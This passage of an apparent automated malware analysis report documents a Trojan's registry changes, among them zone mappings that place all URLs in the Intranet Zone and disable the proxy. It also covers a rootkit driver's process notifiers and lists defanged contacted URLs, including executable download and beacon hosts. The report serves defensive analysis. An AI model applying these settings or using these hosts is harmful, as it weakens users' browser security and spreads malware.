"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 39 3C 26 2D 0A B3 FD 04 BE 7F 3A 32 2B 82 B8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 CA 0F 0B 9B E6 7D E3 7F 0B 6B FB 11 B3 1B 97"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_smk.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 CC 29 C2 B1 9E D4 95 FE 1B DC 7A 99 13 EF 9B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.8.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.8.0.999
File Description:
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://198.232.124.192/t.ashx?e=aonlVHCKlbULjT49fHfOTJHuIH6CGwpk/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8AVhT/AnR7cNDjocuWGH5DkG9rwS1lKyqGxrTqW15vZAdYLC6Fwg82dCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU
hxxp://198.232.124.192/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWLqfIekNLhs5jgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZ7vOXSewT2cgmvUvxZp4nE49Kh4YjX7n00JqwRadIw1A==
hxxp://198.232.124.192/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWDz0zfD6NQ4eEwAaRG2pHiUPesst1ukiDgCtEn0QpjuXhJ1Bh5YeUQcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGe7zl0nsE9nIJr1L8WaeJxOPSoeGI1 59NCasEWnSMNQ=
hxxp://54.239.168.212/smw9476dp.exe
hxxp://198.232.124.192/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWPa HuGTRyAEFAL52sIXt4Ua8Zp/ 13YC175vqqyfEnMnylXnslTRg848241y0s0/3gUxyF5wkLuxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg==
hxxp://198.232.124.192/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWFDwWd9hvLDxFAL52sIXt4V5Y7GubTS4jNqcBUeWZ/68JJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRnu85dJ7BPZyCa9S/FmnicTj0qHhiNfufTQmrBFp0jDU
hxxp://198.232.124.192/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWKnmGGYVS7/B0JQd5HxgIXfmCWsTLnvD bTtF4P/Nzf4R5ehg170ggfw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY5WBf8neB9xf6b0sIPAmWA2SRtjwxr6c3CfN21vL8MkF
hxxp://198.232.124.192/13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJPjBH6ZzUnnXsmxw368usKjGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg==
hxxp://198.232.124.192/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWL6tRdMI7h/vKYX3Ti/i3YOjZeNnmCpUenKu2vOv4IU1x7lHbgMeClaNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ
hxxp://198.232.124.192/13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJPM8BMMVZLFq8mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ
hxxp://198.232.124.192/15287.ashx?e=hWfaA75NtHELjT49fHfOTGcZbTSs7S3w/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8AVhT/AnR7cM/LiHNspT7yPNtJ6SchDLBDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU
hxxp://198.232.124.192/13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJNetwXok6MQkygRO0KnCdHCCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXkQmwo8xpaCHTmEa2mI46MHN/3JP3os6Q
hxxp://198.232.124.192/13880.ashx?e=/k6kR j50tpQhScA1jb3T678RHvyUzuSnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFY5WBf8neB9xf6b0sIPAmWA2SRtjwxr6c3A3wki0FfzrnQR6/4IivvmTPCdbENzDOdINNHDNP6/8qLhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ
hxxp://198.232.124.192/13880.ashx?e=aQQpsP6/AW0LjT49fHfOTJHuIH6CGwpk/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRnu85dJ7BPZyCa9S/FmnicTj0qHhiNfufds34bxlLfK5DHGXB7YFOPGqHZcQIdNYOTmpOQWDw6hY4u3oGHN86wOkpZrNsvTHKpXcKSoKf7ImsTIe5wObHey9BKGIpZn1wUSPdqmKrASUuW0z4fDf/CL5icQHUvxQfe2KCefkiIqiSoA1acazRDQ3/hMAj7hCtv2fF1nx0QWILbeTSdCAAmVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXkQmwo8xpaCHTmEa2mI46MHN/3JP3os6Q
hxxp://198.232.124.192/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWM xh4nuC6oveZAqHIGghM2z4gguKWlYXSbLSETjdRk/LFERPAVIGuKcHXu0JfAt7SC33dsLChBqc6UHTXUDwdyRvBIh2ZnXk/7WBlE7tcVHOnXEWwJ3p8Ee26L2Wr/0PLqD33Si2HsThqLATEMV5kP5vIZgJ5GLR56rDE3ecnl2ePydDVX2aJbSky7hG9JvxnZQiRYsqqweewtZRH9NJG7NGsiglm4ZVzUNL2cV/xGFrNaX60VvhkmEh4NuIRidikbwxdTJ69ttH1NT6eTehRAmHgKct86InYV27rAQ7etpX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF5EJsKPMaWgh05hGtpiOOjBzf9yT96LOkA==
hxxp://198.232.124.192/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp1AS6yP6oxsM5GLBpOcPqKjNx8vJ5rgFy9HY3588pyhg
hxxp://198.232.124.192/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyAIG5PuBtaTrGbcX FTMvYVabDw7nDGU2
hxxp://198.232.124.192/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWAo1JeSgT 5XmlmKz1/6dN1Rfc9FsqZ5xt9dN4nGKxRz8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWOVgX/J3gfcX m9LCDwJlgNkkbY8Ma nNwnzdtby/DJBQ==
hxxp://198.232.124.192/13880.ashx?e=hpY1rXLYst6pJ45fVU/vC0HhmP0JRCH4GcG9b3qYXxr UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45wR Wfb4Zsa/MPo3f 1FoU88LbHT B3j4QS3i7uWq3eyaPJBwCOHNX9jATJeWJrFDkfFuh5aQNK5gKkdlz1lRoVNSQ3lQpjLdBPEhRyyBD7DFByCWgHBKY2uUZfpR/sUHTuXTWi43QJaHiemLsn8TNk9fYJlVn4GQU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adQEusj qMbDORiwaTnD6iozcfLyea4BcvR2N fPKcoYA==
hxxp://198.232.124.192/13880.ashx?e=XJYuqQQo69d2lr6SLgmZct137P FaWoaylUc74 Qgg8gzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wF6p84vT1Zqrte3upwN8WEnBPEhRyyBD7DXy8/ CI2m OeVBPFbDua/xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg==
hxxp://198.232.124.192/13880.ashx?e=2v0SNuZrMFyRcITdAqjv5kHhmP0JRCH4gcFBH2PvehX UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45wR Wfb4Zsa/MPo3f 1FoU88LbHT B3j4QS3i7uWq3eyaPJBwCOHNX9jATJeWJrFDo2Fq9Oiiau1gKkdlz1lRofr/zw3mMKgg0JQd5HxgIXdXSs 69z5tFbQfHq0QVBDfGyD/5jiBcsklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGe7zl0nsE9nIJr1L8WaeJxOPSoeGI1 59NCasEWnSMNQ=
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&md5=70c2941195cd1efe529fc86f958991c2&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=0F21F0C2-B8D7-4B08-8BD5-E9AF71328A77	54.239.168.241
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&md5=5f53f6b6b77b6c86decfc0ea972a3724&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=0F21F0C2-B8D7-4B08-8BD5-E9AF71328A77	54.239.168.241
hxxp://pwvz71qp-ur1xo6pn.netdna-ssl.com/wu.ashx?dsid=1&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc	198.232.124.192
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&md5=ba08d482fe72cecca3140fe4c115de20&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=0F21F0C2-B8D7-4B08-8BD5-E9AF71328A77	54.239.168.241
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWM xh4nuC6oveZAqHIGghM2z4gguKWlYXSbLSETjdRk/LFERPAVIGuKcHXu0JfAt7SC33dsLChBqc6UHTXUDwdyRvBIh2ZnXk/7WBlE7tcVHOnXEWwJ3p8Ee26L2Wr/0PLqD33Si2HsThqLATEMV5kP5vIZgJ5GLR56rDE3ecnl2ePydDVX2aJbSky7hG9JvxnZQiRYsqqweewtZRH9NJG7NGsiglm4ZVzUNL2cV/xGFrNaX60VvhkmEh4NuIRidikbwxdTJ69ttH1NT6eTehRAmHgKct86InYV27rAQ7etpX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF5EJsKPMaWgh05hGtpiOOjBzf9yT96LOkA==
hxxp://d13s98z2lzti92.cloudfront.net/smw9476dp.exe
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=hpY1rXLYst6pJ45fVU/vC0HhmP0JRCH4GcG9b3qYXxr UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45wR Wfb4Zsa/MPo3f 1FoU88LbHT B3j4QS3i7uWq3eyaPJBwCOHNX9jATJeWJrFDkfFuh5aQNK5gKkdlz1lRoVNSQ3lQpjLdBPEhRyyBD7DFByCWgHBKY2uUZfpR/sUHTuXTWi43QJaHiemLsn8TNk9fYJlVn4GQU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adQEusj qMbDORiwaTnD6iozcfLyea4BcvR2N fPKcoYA==
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJPM8BMMVZLFq8mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWKnmGGYVS7/B0JQd5HxgIXfmCWsTLnvD bTtF4P/Nzf4R5ehg170ggfw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY5WBf8neB9xf6b0sIPAmWA2SRtjwxr6c3CfN21vL8MkF
hxxp://z51hj2j2v-mzxspesu.netdna-ssl.com/t.ashx?e=aonlVHCKlbULjT49fHfOTJHuIH6CGwpk/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8AVhT/AnR7cNDjocuWGH5DkG9rwS1lKyqGxrTqW15vZAdYLC6Fwg82dCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWDz0zfD6NQ4eEwAaRG2pHiUPesst1ukiDgCtEn0QpjuXhJ1Bh5YeUQcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGe7zl0nsE9nIJr1L8WaeJxOPSoeGI1 59NCasEWnSMNQ=
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWFDwWd9hvLDxFAL52sIXt4V5Y7GubTS4jNqcBUeWZ/68JJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRnu85dJ7BPZyCa9S/FmnicTj0qHhiNfufTQmrBFp0jDU
